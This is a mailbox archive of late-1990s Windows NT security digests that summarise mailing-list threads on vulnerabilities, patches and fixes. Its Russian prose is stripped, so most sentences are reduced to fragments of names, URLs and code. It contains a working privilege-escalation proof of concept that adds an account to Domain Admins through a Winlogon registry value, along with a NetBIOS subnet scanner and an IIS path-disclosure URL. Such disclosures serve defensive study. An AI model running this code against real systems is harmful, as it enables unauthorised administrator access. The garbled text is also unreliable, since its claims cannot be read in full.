http://www.zdnet.com/zdnn/stories/news/0,4586,2178239,00.html

  Russ,    NAI,    
    .

3.   Shockwave  Netscape

Adam Maloney <adam@IEXPOSURE.COM> (ntbugtraq)   
,   Shockwave  Netscape.    
  .swf      ,    
  Netscape     .  
,      ,   
   ftp    ASCII,   . 
,          
.

4. Lotus Domino

szvacek@kcp.com (ntsecurity, iss)      Lotus Domino 
 Lotus Notes  NT.

Scott Moore <smoore@iss.net> ,     Lotus Domino 
SMTP    ,      
.       
www.lotus.com.

"Bryn Wales" <Bryn@netinfo.co.uk>   
  Lotus Notes.      .

5.   IP-

Dan Ritter <Dan.Ritter@dal.frb.org> (ntsecurity, iss) ,   IP-
       .

"Mike King" <mdking@mindspring.com>    ping 
name,  name -   .

Neil Moore-Smith <nms@crescendo.ltd.uk>   
  NETMON.

6.     
 

Ron Watkins <rwatkins@ZAPCOM.NET> (ntbugtraq) ,   
  c:\exchverify.log   Arcserve Exchange Client . 
    (build) 57       
 .

************************************************************
   Sunbelt

 ,   W2K Beta 3, Release Candidate ZERO 
(RC0).

,       

- Alpha code (rough)
- Beta 1
- Beta 2
- Beta 3
- Release Candidate 1
- Release Candidate 2
- Release Candidate 3 ( )
- GOLD code to manufacturing.
- .

   Beta 2    .

1)   Active Directory
2)      .
3)        
.


From rudnyi Mon Jan  4 10:58:57 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA09034
	for rudnyi@comp.chem.msu.su; Mon, 4 Jan 1999 10:58:57 +0300 (MSK)
Date: Mon, 4 Jan 1999 10:58:57 +0300 (MSK)
Message-Id: <199901040758.KAA09034@comp.chem.msu.su>
Subject: digest 21-31.12.98
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: O

   Windows NT

() 1998,   ,    

   http://www.training.ru/security/    
 security@training.ru

21 - 31  1998 

   "     Windows 
NT" (http://www.training.ru/security/book.htm)

 (certificate) -  ,    
,  ,    
,     .

   training.ru.

         : 
    8       
  - !

   http://www.training.ru/HappyNewYear.htm



   .  
ntsecurity@listserv.ntbugtraq.com, -,  .

1. Remote Explorer

  ntbugtraq      , 
  Windows NT.     
   - .

Vesselin Bontchev <bontchev@COMPLEX.IS> (ntbugtraq)    
  "Are Good Viruses Still a Bad Idea?",   

ftp://ftp.informatik.uni-hamburg.de/pub/virus/texts/viruses/goodvir.zip

David LeBlanc <dleblanc@MINDSPRING.COM> (ntbugtraq) ,  
  - (explorer.exe, progman.exe, etc.),  
 ,       
.  ,        
CreateProcessAsUser().  -      
.

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,     
 ,    (impersonating) .

David LeBlanc <dleblanc@MINDSPRING.COM> (ntbugtraq)  . 
    ImpersonateNamedPipeClient() 
  .      SE_DEBUG,  
 ,   ,      
 .

System Grunt <poidog@IAV.COM> (ntbugtraq) ,   
     alt.comp.virus.

Vesselin Bontchev <bontchev@COMPLEX.IS> (ntbugtraq) ,   
 ,    ,   , 
  .

David LeBlanc <dleblanc@MINDSPRING.COM> (ntbugtraq) ,  
     LocalSystem,      
   .

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)   

http://www.avp.com/about/press/122398/body_122398.html
http://www.news.com/News/Item/0,4,30291,00.html?st.ne.lh..ni

2.     Internet Explorer

Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> (ntbugtraq) 
     IE,      Cuartango 
(Grand-Son of Cuartango hole).     

http://pages.whowhere.com/computers/cuartangojc/gson2.html

   ("Frame Spoof Fix")   

http://www.microsoft.com/windows/ie/security/spoof.asp

3. SMTP  Option Pack  Qmail

Nelson Bunker <nelson_bunker@WMV.NET> (ntbugtraq) (ntsecurity, iss) 
,        SMTP  
Option Pack     Qmail.   
   Qmail,  SMTP  Option Pack 
  Qmail. SP4  .

4. SP4

tony skwerski <tskwerski@mpdr0.chicago.il.ameritech.net> (ntsecurity, iss) 
,  SP4   Lotus Notes.

5.     

"Decker, Brady" <BDecker@prcnet.com> (ntsecurity, iss)  , 
  File Manager     , 
    .

1)   Help   Start.
2)    Index.
3)   File Manager     .
4)     ,  "If you've used Windows before: 
answers to common questions"  "Running File Manager".   "Running 
File Manager".
5)     ,     File Manager.

6.   GET  IIS

"MJE" <mark@ntshop.net> (ntsecurity, iss)      
,    -   
   GET.

http://www.microsoft.com/security/bulletins/ms98-019.asp.

Microsoft Knowledge Base (KB) article Q192296,
IIS: Patch Available for IIS "GET" Vulnerability,
http://support.microsoft.com/support/kb/articles/q192/2/96.asp.

ftp://ftp.microsoft.com/bussys/iis/iis-public
/fixes/usa/security/Infget-fix/infget3i.exe
ftp://ftp.microsoft.com/bussys/iis/iis-public
/fixes/usa/security/Infget-fix/infget4i.exe

7.   

"David Pederzoli" <davidpederzoli@cariplo.it> (ntsecurity, iss)   
  Unicenter TNG Single Sign ON,   
  Winlogon Windows NT,  ,   .

Wesley Peace <Wesley.Peace@ncons.com> (ntsecurity, iss) ,  
       
   .

Frank Knobbe <FKnobbe@Home.com> (ntsecurity, iss) ,   
    MSGINA.DLL.  
  .

8. ,    NT

"Smith, Dale" <leesmith@mbc-net.com> (ntsecurity, iss)  
 ,    NT.

Functionality                 UDP        TCP        IP
Browsing                      137,138
DHCP Lease                    67,68
DHCP Manager                            135
DNS Administration                      139
DNS Resolution                53
Exchange Administrator                  135
Exchange Client/Server Comm.            135
File Sharing                            139
IMAP                                    143
LDAP                                    389
LDAP (SSL)                              636
Logon Sequence                137,138   139
MTA - X.400 over TCP/IP                 102
NetLogon                      138
NT Diagnostics                          139
NT Directory Replication      138       139
NT Event Viewer                         139
NT Performance Monitor                  139
NT Registry Editor                      139
NT Secure Channel             137,138   139
NT Server Manager                       139
NT Trusts                     137,138   139
NT User Manager                         139
Pass Through Validation       137,138   139
POP3                                    110
PPTP                                    1723      47
Printing                      137,138   139
RPC                           135       135
SMTP                                    25
WINS Manager                            135
WINS Registration                       137
WINS Replication                        42

+-------------------------------+-----------------------------------+
| Micheal Espinola Jr           | Hardening NT 4 Security Checklist |
| NT Administrator              | http://www.netcom.com/~honeyluv/  |
| mailto:micheale@ix.netcom.com |                                   |
+-------------------------------+-----------------------------------+

9.     
 

"Vale Steve, Barclays Life" <Steve.Vale@BARCLAYS.CO.UK> (ntbugtraq) 
,    BackWeb (NAI)     
     

HKEY_CURRENT_USER\Software\Backweb\Backweb\Communication

From rudnyi Mon Jan 11 23:23:06 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id XAA25493
	for rudnyi@comp.chem.msu.su; Mon, 11 Jan 1999 23:23:05 +0300 (MSK)
Date: Mon, 11 Jan 1999 23:23:05 +0300 (MSK)
Message-Id: <199901112023.XAA25493@comp.chem.msu.su>
Subject: digest 1-7.1.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: O

   Windows NT

() 1998,   ,    

   http://www.training.ru/security/    
 security@training.ru

1 - 7  1999 

   "     Windows 
NT" (http://www.training.ru/security/book.htm)

  (authentication) - , ,  
  ,    .    
   ,     
.

       . 
 ntsecurity@listserv.ntbugtraq.com    ,  
  Russ Cooper (7.1.99)  ,     
. Russ     ,   
      FAQ.    
   ,   ,    
.

    .

1. ,   Remote 
Explorer

 X-Force <xforce@iss.net> (ntsecurity, iss)   
 (http://www.iss.net/xforce).

Remote Explorer -  ,    NT    
     . Remote Explorer     
,    NT.    .exe ,   
       (resource)   
 PSAPI.DLL.         
       ie403.sys (  
%systemroot%\system32\drivers).  ,  , 
  ,        
 .        
   .

          
   .     ,   
    taskmgr.sys       
.       %systemroot%  
C:\Program Files   .      
       gzip. 

  ,    -, .

      ,  
  NT. ,   Server Manager.

1.  .
2.   Computer  Services.    
Services.
3. ,   "Remote Explorer".
4.  ,   .
5.   Startup   Startup Type  Disabled.
6.  OK.
7.   Stop   .  Yes  
.

       sc.exe  
Windows NT Resource Kit.

      ISS Internet Scanner 
 Windows NT.

    

CERT(R) Incident Note IN-98-07 "Windows NT 'Remote Explorer' Virus" at
http://www.cert.org/incident_notes/IN-98-07.html

Central Command Antivirus Center "Antiviral Toolkit Pro (AVP)" at
http://www.avp.com (free detector-cleaner)

Data Fellows Computer Virus Information Pages for RemExp, also known as
Rich, Remote_Explorer, IE403R.SYS, RICHS at
http://www.datafellows.com/v-descs/rich.htm

Microsoft Security Advisor "Information on the 'Remote Explorer' or
'RICHS' Virus" at http://www.microsoft.com/security/bulletins/remote.asp

2.     
  W9x

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)   ,   
 

http://www.l0pht.com/advisories/95replay.txt

     W9x.  ,  
       W9x      
  (Challenge)    .   
 ,  ,  
  (Response) ,  ,     
W9x    .      
.

    Windows NT,      
,       W9x.

     .  
  W9x        . 
  NT        
,       .  ,  
      NT   
   W9x (  SP4).  

http://support.microsoft.com/support/kb/articles/q147/7/06.asp

3. CALL  Microsoft Excel

Hobe Industries <hobe_industries@HOTMAIL.COM> (ntbugtraq)  
    CALL  Microsoft Excel. , Microsoft 
Excel ( Office '95  Office '97)     CALL,  
    ,  DLL,  
 .     
   Excel ,      
    ,   .  
       
.

   Microsoft  Netscape  3.x  
4.x,      ,  Microsoft 
Outlook 98.

      Office '97, 
    CALL.

http://www.microsoft.com/security/bulletins/ms98-018.asp
http://officeupdate.microsoft.com/downloadDetails/xl97cfp.htm

 Office '95      .   - 
   *.xls,      
  -.

4. NTW4 SP4 SCM  Oultook 98

      Oultook 98,   
 SCM.

Larry Swisher <larry@APTEK.COM> (ntbugtraq)   . 

:  Outlook '98,   ,  
      (Group address). 
  "messaging interface unknown error".

:    Modify   %systemroot%\mapiuid.ini. 
    .

       Filemon 
Regmon  NT  System Internals (www.sysinternal.com),  
   ,       
  .

5.  April 2001

"Richard M. Smith" <rms@PHARLAP.COM> (ntbugtraq) ,   
 2001      . 
 Windows c 1  8  2001    , 
     .     
Visual C++ MSVCRT.DLL.

http://security.pharlap.com/y2k/demo1.htm

6. WinNT, ZAK  Office 97

Mikko Verlinna <mikko.verlinna@TELIA.COM> (ntbugtraq)   
 .   ZAK  WinNT 4.0 (SP3)  Office 
97    ,  -  
 Explore  .   Open  
 Word.   .    
          , 
   Explorer.  ,    
.

7.     


"R.Sathiyamurthy" <rsmurthy@hclt.com> (ntsecurity, iss)   
-   (port scan detector)  NT.  
  SOCK_RAW  IPPROTO_TCP,   
,          
 .

"Marc" <Marc@eEye.com> (ntsecurity, iss) ,    
    .

 David LeBlanc <dleblanc@iss.net> (ntsecurity, iss)   . 
 ,    SOCK_RAW,   
 IPPROTO_IP,     recvfrom().   
    ,   
IP.   -      NT 
4.0.

Eric Arnold <earnold@hitech.eds.com> (ntsecurity, iss)    
VB,       .

Private Sub Form_Load()
    tcpServer.LocalPort = 87
    tcpServer.Listen
End Sub

Private Sub tcpServer_ConnectionRequest(ByVal requestID As Long)
    
    ' Check if the control's State is closed. If not,
    ' close the connection before accepting the new
    ' connection.
    
   If tcpServer.State <> sckClosed Then tcpServer.Close
        
    ' Accept the request with the requestID
    ' parameter.
    
    tcpServer.Accept requestID
    strLogEvent = "Possible Port Scanning Attempt From: " &
tcpServer.RemoteHostIP

    ' Write event to Application Log

    App.LogEvent strLogEvent, 1
    
    ' reset the socket
    tcpServer.Close
    tcpServer.Listen
End Sub

8.   

rob <rob@consoftware.com> (ntsecurity, iss) ,   
  ,     
 .     ,   
         
.  ,      
(Cookies),   -.

"Michael E. Cummins" <webmaster@i-magery.com> (ntsecurity, iss) , 
      ,   .   
      , 
        .

"Nanolink Sysop" <bigelf@nkn.net> (ntsecurity, iss)   
,   .

[HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info]
"DefName"="theNameYouGaveWhenYouInstalledTheOS"
"DefCompany"="theNameYouGaveWhenYouInstalledTheOS"

"CHRIS HANNA" <mindgamze@hotmail.com> (ntsecurity, iss)   
  ,    .

HKEY_CURRENT_USER\Software\microsoft\MS Setup(acme)\user
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\User information
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

aksite@col3.telecom.com.co (ntsecurity, iss) ,  - 
    ,   "v-card". 
,  Jscript

navigator.userProfile.addReadRequest("vcard.variable")
navigator.userProfile.doReadRequest("vcard.variable")
navigator.userProfile.getAttribute("vcard.variable")

9.     
 

Weld Pond <weld@L0PHT.COM> (ntbugtraq) ,  L0phtCrack 2.5 
  ,      TEMP. 
    2.51.

***********************************************************
   Sunbelt, http://www.sunbelt-software.com

  BDC SP3  PDC,    PDC  
SP4 (http://support.microsoft.com/support/kb/articles/q197/4/88.asp?FR=0).

 SP2  Exchange 5.5.

http://www.backoffice.microsoft.com/downtrial/default.asp
http://www.backoffice.microsoft.com/downtrial/moreinfo/ex55sp2.asp

    Exchange

http://backoffice.microsoft.com/downtrial/moreinfo/Ex55sp1wizard.asp

  (Exception Monitor)  IIS    
    -.

http://www.microsoft.com/workshop/server/iis/ixcptmon.asp

 Trend Micro Inc.      
  REMOTE EXPLORER.

http://housecall.antivirus.com.

    Virtuosity
(http://www.sunbelt-software.com/virtuos.htm)

http://www.infoworld.com/cgi-bin/displayArchive.pl?/98/51/nr01-51.39b.htm

 ,       
  MS    (120 , 
).

http://www.savilltech.com/download/wininfo.zip

,       ,   
NT FAQ (http://www.ntfaq.com).

     Knowledge Base   
.     mshelp@microsoft.com,    
 . ,

Subject: Q178049, Q174914, Q174062

     

Subject: Index


From rudnyi Sun Jan 17 18:37:33 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id SAA08177
	for rudnyi@comp.chem.msu.su; Sun, 17 Jan 1999 18:37:33 +0300 (MSK)
Date: Sun, 17 Jan 1999 18:37:33 +0300 (MSK)
Message-Id: <199901171537.SAA08177@comp.chem.msu.su>
Subject: digest 8-14.1.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Widnows NT

() 1999,   ,    

   http://www.training.ru/security/    
 security@training.ru

8 - 14  1999 

   "     Windows 
NT" (http://www.training.ru/security/book.htm)

 (privileges) -   , .. 
       
.  -     .

      .   
ntsecurity@listserv.ntbugtraq.com  ,   
  .

    .

1.      


mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) (ntsecurity, iss) 
http://www.infowar.co.uk/mnemonix/ ,    , 
  ,    (Server 
Operator)       .

      Special Access,  
   "Set Value"  

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

       "System:REG_SZ:lsass.exe". 
        ,    
   .      ,  
      ,    
,   SAM   Ctrl+Alt+Del   
  .      
    .

-----------------------8<-------------------------------------------------

/* GetadmforSops.exe - David Litchfield 11 Jan 1999 */
/* Compile with eg Visual C++ and link with netapi32.lib */

#define UNICODE
#include <windows.h>
#include <wchar.h>
#include <lmaccess.h>
#include <winbase.h>

int __cdecl wmain (void)
{
 LPWSTR group = L"Domain Admins";
 LPWSTR acc = L"acc_name";

 NET_API_STATUS nas=0;

 _sleep(180000);
  if( (nas=NetGroupAddUser(NULL, group, acc)) == 0)
  {
   wprintf(L"Success");
   return 0;
  }
   return 0;
}

----------------------->8------------------------------------------------

  ,    
System:REG_SZ:lsass,c:\FULL_PATH_TO\getadmforsops.exe,  .

Paul Leach <paulle@MICROSOFT.COM> (ntbugtraq) ,   
   

http://www.microsoft.com/ntserver/security/exec/
overview/Secure_NTInstall.asp

 1997 .

David LeBlanc <dleblanc@MINDSPRING.COM> (ntbugtraq)  , 
        
ISS scanner,    4.3.

2.  FIPS 140-1

Marc Bejarano <marc@DELTA-GLOBAL.COM> (ntbugtraq)  
  

http://www.nwfusion.com/news/0111ntcrypt.html

  ,      
  Federal Information Processing Standard (FIPS) 140-
1.

Jason Garms <jasong@MICROSOFT.COM> (ntbugtraq) ,  
    .  FIPS 
140-1   ,       Microsoft Enhanced 
DSS/Diffie-Hellman Cryptographic Provider (CSP).

3.   NETBIOS

Lord Chr0n0s <browne@MARIETTA.EDU> (ntbugtraq)    
Perl,       NETBIOS    
C.

-----CUT HERE----

#!c:\Perl\bin\perl.exe
#you don't need that line i just felt like putting it there
#if you change it and you think it is cool, send me a copy please

print "Welcome to NetBios Scan 1.0 for Perl for Win32!\n",
      "This program is made by Nick Brown (browne\@marietta.edu).\n\n";
print "Enter the first 3 fields to scan (example: 122.22.46): ";
$first3 = <stdin>;
chop($first3);
$first3 = $first3 . ".";
$last = "1";
print "Any responses will be written to nbtscanlog.txt\n";
open (LOGFILE, ">>./nbtscanlog.txt");
while ($last < 255){
print "scanning $first3$last\n";
$nbtout = `nbtstat -a $first3$last`;
  unless ($nbtout eq "Host not found."){
  print "Output from $first3$last:$nbtout", "\n";
  print LOGFILE "Output from $first3$last:$nbtout", "\n";
  }
$last = ($last + 1);
}
print "Done scanning $first3\*.  Press any key to exit.";
$wait = <stdin>;

----STOP CUTTING----

4. PPTP

Viktor Borisov <blaster@sync-sys.com> (ntsecurity, iss) ,   
   telnet c  TCP 1723 NT ( 
PPTP),   "testtest"  ,    
  PPTP    NT    
 (blue screen of death).    NT SP3    
 NT SP4.

5.  

Matt Moore <MMoore@questinfo.com> (ntsecurity, iss)   , 
 MS Proxy   161 (SNMP).    
,      .  
 -       .

"John Jorgensen" <jjorgensen@calibersys.com> (ntsecurity, iss) ,  
  SNMP     .

David LeBlanc <dleblanc@iss.net> (ntsecurity, iss) ,   
  ,     (, ), 
       
SNMP,      .

"David Bovee" <dbovee@seanet.com> (ntsecurity, iss) ,   
    SNMP.   ,  
   ,    MS Proxy  
      .   
      .

6. IIS 4.0

mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq)  
 ,    IIS 4.0,  
 IIS 2.0  3.0

 -,  ,   
127.0.0.1,    /scripts/iisadmin   ism.dll,  
       . ,

http://www.server.com/scripts/iisadmin/ism.dll?http/dir

    .

 fpcount.exe,    Frontpage  
 NT Option Pack,  ,    , 
   .   
   Frontpage 98,     
 .

7.    NT

John-David Childs <jdc@nterprise.net> (ntsecurity, iss)   
,        
 NT

WinRoute Pro (http://www.winroute.com)
WinGate (http://www.wingate.com)
MS Proxy v.2
MS NT 5.0 beta 2
Winroute Pro   www.winroute.com
NT based NAT   http://willow.canberra.edu.au/~chrisc/nat32.html
NT NAT   
http://www.litterbox.org/~hamors/documentation/iproute/index.shtml
NAT1000  Nevod, Inc (http://www.nevod.com )
nat32, www.nat32.com

  -  Linux c IPFW (linux.router.org, 
www.linuxrouter.org  www.fireplug.net).

8.      

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
,        
    .

 NT Resource Kit    TZEdit.exe  Timezone.exe. 
TZEdit.exe       
  (Time Zones). TZEdit.exe   , 
   ,      
  Control Panel/Date&Time. 

Timezone.exe       Daylight 
Savings Time (DST).     .

\HKEY_LOCAL_MACHINE
 \SYSTEM
  \CurrentControlSet
   \Control
    \TimeZoneInformation

Timezone.exe     NT Resource Kit ,   
    MS' FTP.

http://support.microsoft.com/support/kb/articles/q194/3/64.asp?FR=0
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/reskit/nt40/i386/

Timezone.exe    ,   
 ,    .

"Bill Potvin, II" <bpotvin@MERXSOFT.COM> (ntbugtraq) ,  
TZEdit.exe    ,   

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Time Zones

9.    

Chris.Brodie@BANKERSTRUST.COM.AU (ntsecurity, cooper) ,  
        API.

Abhijit Limaye <Abhijit@QSPL.STPP.SOFT.NET> (ntsecurity, cooper) 
,      NetUserModalsGet  
NetUserModalsSet.    ADSI.   - 
  DirectScript (http://www.entevo.com/prodF2.html).

"Andrew S. Baker" <ABaker@MININGCO.COM> (ntsecurity, cooper) 
   NTUSER.EXE  NTSec Tools 
(http://www.pedestalsoftware.com)

David LeBlanc <dleblanc@MINDSPRING.COM> (ntsecurity, cooper)  
   NetUserModals[Get|Set]()   
 net accounts.

Frank Heyne <fh@RCS.URZ.TU-DRESDEN.DE> (ntsecurity, cooper) 
http://rcswww.urz.tu-dresden.de/~fh/    net 
accounts

NET ACCOUNTS /MINPWLEN:6
NET ACCOUNTS /MAXPWAGE:180
NET ACCOUNTS /UNIQUEPW:3
net accounts /LOCKOUTTHRESHOLD:5
net accounts /LOCKOUTDURATION:15
net accounts /LOCKOUTWINDOW:15


From rudnyi Tue Jan 26 14:48:18 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id OAA17467
	for rudnyi@comp.chem.msu.su; Tue, 26 Jan 1999 14:48:17 +0300 (MSK)
Date: Tue, 26 Jan 1999 14:48:17 +0300 (MSK)
Message-Id: <199901261148.OAA17467@comp.chem.msu.su>
Subject: digest 15-21.1.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,    

   http://www.training.ru/security/    
 security@training.ru

15 - 21  1999 

   "     Windows 
NT" (http://www.training.ru/security/book.htm)

  (public key) -      
.     ,     
   .    
     .


    .

1. IIS4.0  Visual Interdev

Adam Berns <adamb@UBET.COM> (ntbugtraq) ,     
Visual Interdev 6.0    IIS 4.0   
. 

   IIS4.0  Service Pack 4      

Security Configuration manager   hisecdc4
Front Page Server Extension
The ASP.dll Patch (q177036 kb article)
The msiisp1i386 Patch (q148188 kb article)
The ctrfix (q185349 kb article)
The IISUPDI Patch (q192224 kb article)
The nprpc Patch (q195733 kb article)
The ftpfix Patch (q189262 kb article)
The iis4-datafix (q188806 kb article)

      

Drive:\webroot
    Administrators: Full
    Interactive: List
    Network:  RX
    System: Full

Drive:\webroot\public_html (root web)
    Administrators: None
    Interactive: List
    Internet Guest Account:  RX

Christopher Timmons <ctimmons@NORTELNETWORKS.COM> (ntbugtraq) 
,     ,     
 {The msiisp1i386 Patch (q148188 kb article)  The ASP.dll Patch 
(q177036 kb article)}  ,     Service Pack 4 
    .

"Walker, Randy" <verrice@RASAM.COM> (ntbugtraq) ,   
  .     .

2.   IIS Guest account

Vahan Amirbekyan <vahan@OSI.AM> (ntsecurity, cooper)   
 .         
 IIS Guest,        .

Michael Howard <mikehow@MICROSOFT.COM> (ntsecurity, cooper) , 
      

http://support.microsoft.com/support/kb/articles/q185/8/74.asp?FR=0

3. Run, RunOnce  RunOnceEx

"mnemonix" <mnemonix@globalnet.co.uk> 
http://www.infowar.co.uk/mnemonix/ (ntsecurity, iss) ,   
   Run 
(HKLM\Software\Microsoft\Windows\CurrentVersion\)   Set 
Value  Everyone (  SP3),     
   " ".   RunOnce Everyone 
  Set Value    . ,  
 Internet Explorer 4    RunOnceEx,  
       
,   Everyone   Set Value.

4. PASSFILT.DLL

Randy Wood <Randy.Wood@NAU.EDU> (ntsecurity, iss)   
,     passfilt.dll. 
   ,    
  .

5. SP4  Compaq

David P Gilliam <david.p.gilliam@jpl.nasa.gov> (ntsecurity, iss) ,   
    SP4   Compaq  
 ,   .

6.    

Davis, Thomas R. [mailto:tdavis@INDIANA.EDU] (ntsecurity, cooper) , 
 ,        .

Abhijit Limaye <Abhijit@QSPL.STPP.SOFT.NET> (ntsecurity, cooper) , 
     USER_INFO_XX    , 
,   ,  SAM   .

David LeBlanc <dleblanc@MINDSPRING.COM> (ntsecurity, cooper) 
,        
 -     ( ,     
).

7. NTFSDOS

  ntsecurity, cooper   ,    
 NTFSDOS. "Steve Craft (ITS_DDI)" 
<Stephen.Craft@MAIL.TJU.EDU>,   ,  
.      
 (    , CD,   ),  
    NTFSDOS -   
   ,   NTFS   
 8 . 

 "Dimitry Andric" <dim@xs4all.nl> (ntsecurity, iss)   
, ERD commander ($250, 
http://www.winternals.com/erdcmndr.html),      
  8   NTFS.

"Dieter Spaar" <spaar@mirider.augusta.de> (ntsecurity, iss)    
  NTAccess $US 90.00 
(http://www.mirider.com/ntaccess.html).   ,  NTAccess  
 syskey.

8.   

Eric Fors <ewfors@COXNET.ORG> (ntsecurity, cooper) (ntsecurity, wwa) 
(ntsecurity, iss)     ,  
   .    
      (MAC-)   
        MAC-
.    .

Ryan Russell <Ryan.Russell@SYBASE.COM> (ntsecurity, cooper) ,  
   ,    
       
.        .

Chris Brenton <cbrenton@sover.net> (ntsecurity, wwa)  ,   
   .      
 ,    .

9.  

Matt Moore <MMoore@questinfo.com> (ntsecurity, iss)    
 ,     NT - Password 
Appraiser, http://www.quakenbush.com.

Weld Pond <weld@l0pht.com> (ntsecurity, iss) ,    
   .

10.  

David LeBlanc <dleblanc@iss.net> (ntsecurity, iss)    
    .

1)   NT  . '95, '98  .
2)   LM-,    ( 
 )
3) ,         
   . 
4)  syskey.
5)       7 .
6)    ,     
   7 .

*************************************************************
   Sunbelt (http://www.sunbelt-software.com)

 Silicon Graphics, Inc, http://www.sgi.com/    
    NT  "visual computing".   
  

- SGI superfast COBALT graphics chipset
- 10/100 Ethernet built in
- Can have two Pentium II , 450Mhz CPUs
- Ultra ATA or SCSI up to 28Gig drives
- SuperWide 17.3 Inch Flat Panel Display (add $2,495)
- Scalable to 1 Gig ECC SDRAM !

 NT Server    1998     44%,   
  1997.

 1997   1268000 NT Server,    1998  
  1400000,  1999 - 1831999,  2000 - 2.3 .  1996 
NT Server  19.3%   ,  1997 - 34.2%.  
Unix-   48.9  45.8%.  ,   NT 
     Netware.

  Novell ,  Netware 5  NT  34 
.      ,    
, NT  Netware 5  25 .

http://www.microsoft.com/ntserver/nts/news/msnw/netwarecomp.asp


From rudnyi Mon Feb  1 12:40:21 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id MAA18808
	for rudnyi@comp.chem.msu.su; Mon, 1 Feb 1999 12:40:21 +0300 (MSK)
Date: Mon, 1 Feb 1999 12:40:21 +0300 (MSK)
Message-Id: <199902010940.MAA18808@comp.chem.msu.su>
Subject: digest 22-28.1.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Widnows NT

() 1999,   ,    

   http://www.training.ru/security/    
 security@training.ru

22 - 28  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa).

1. IIS4.0  Visual Interdev

  ,   ,   
 ,  Adam Berns <adamb@UBET.COM>   
 Visual Interdev 6.0   IIS 4.0   
.

Adam Berns <adamb@UBET.COM> (ntbugtraq) ,    
    Visual Interdev 6.0.    
    Security Configuration Manager.   
      ,     
  FrontPage,      .

"Jesper M. Johansson" <jesper.m.johansson-1@UMN.EDU> (ntbugtraq) 
      
  Explorer,      FrontPage.

2.   IIS4

mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) (ntsecurity, iss) 
,  IIS4    ,   
,     ,  . 
,   default.asp  
AAAAAAAAAAAAAAAAAAAAAAAAA   .   
  10150  (),  IIS4  , 
   .

      

http://www.infowar.co.uk/mnemonix/avoid.exe

IIS4 + SP4   .

Information Services <omigosh@CARIBSURF.COM> (ntbugtraq)  
  NT4/IIS3/SP4 +  IIS GET  ,  
     .

mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) (ntsecurity, iss) 
,     .    
 .  ,  IIS 3   IIS 4  NT 
Option Pack  Service Pack 3  4,  , 
  avoid  .

3.  ExAir  IIS4

mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) (ntsecurity, iss) 
,         
ExAir

Exair - root/search/advsearch.asp
Exair - root/search/query.asp
Exair -root/search/search.asp

     IIS.  -   ,   
   .

 NTInfoScan ,      

http://www.infowar.co.uk/mnemonix/ntinfoscan.htm

4.  "  "  FTP 


eEye Digital Security Team, http://www.eEye.com (ntbugtraq) (ntsecurity, iss) 
,  Microsoft IIS (Internet Information Server) FTP  (Windows 
NT 4.0 (SP4) IIS 3.0 / 4.0)  ,    
,   NLST.      "  
".

Marc <Marc@EEYE.COM> (ntbugtraq)  ,    
    IIS3.0/4.0 + sp3.

5.    ASP-

Ivan Hamilton <ivan@AXIS.COM.AU> (ntbugtraq)   
.    IIS    
.     ASP-    
 . 

Rusten McKenzie <rusten@DATAWIDE.COM> (ntbugtraq) ,  
    (Q197003)

http://support.microsoft.com/support/kb/articles/q197/0/03.asp?FR=0

6.   IE4

Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> (ntbugtraq) 
,       IE4.   javascript  
     .     
 IE4,     ActiveX "MS Forms 2.0",  
    

Microsoft Office 97
Microsot Outlook 98
Microsoft Project 98
Microsoft Visual Basic 5.0
 ,   VB  VBA

     

http://pages.whowhere.com/computers/cuartangojc

  

http://www.microsoft.com/security/bulletins/ms99-001.asp

Eamonn Turley <ETurley@ALBAN.CO.UK> (ntbugtraq) ,   
      IE4,    ,  
   ActiveX.

Vesselin Bontchev <bontchev@COMPLEX.IS> (ntbugtraq)   
    ,   . 
   Internet Explorer 4.x  5.x  Word 97 (beta,  
, SR-1,  SR-2)     . 1)   
URL,    DOC/XLS/PPT, IE4  
  . 2)   
  -. 3)   , 
  ,       
  . 4)   Word 97  
     ,    ,  
  . 5) Word 97    
   URL.

  Microsoft   :

  http://www.microsoft.com/security/bulletins/ms99-002.asp
  http://officeupdate.microsoft.com/downloaddetails/wd97sp.htm

Georgi Guninski <guninski@HOTMAIL.COM> (ntbugtraq)  , 
  Javascript.    .

http://www.geocities.com/ResearchTriangle/1711/read3.html
http://www.geocities.com/ResearchTriangle/1711/read4.html
http://www.geocities.com/ResearchTriangle/1711/read5.html

7.  Option Pack

"matt moore" <tocsin102@hotmail.com> (ntsecurity, iss) ,   
  Option Pack     .cab,   
       .    
    ,     , 


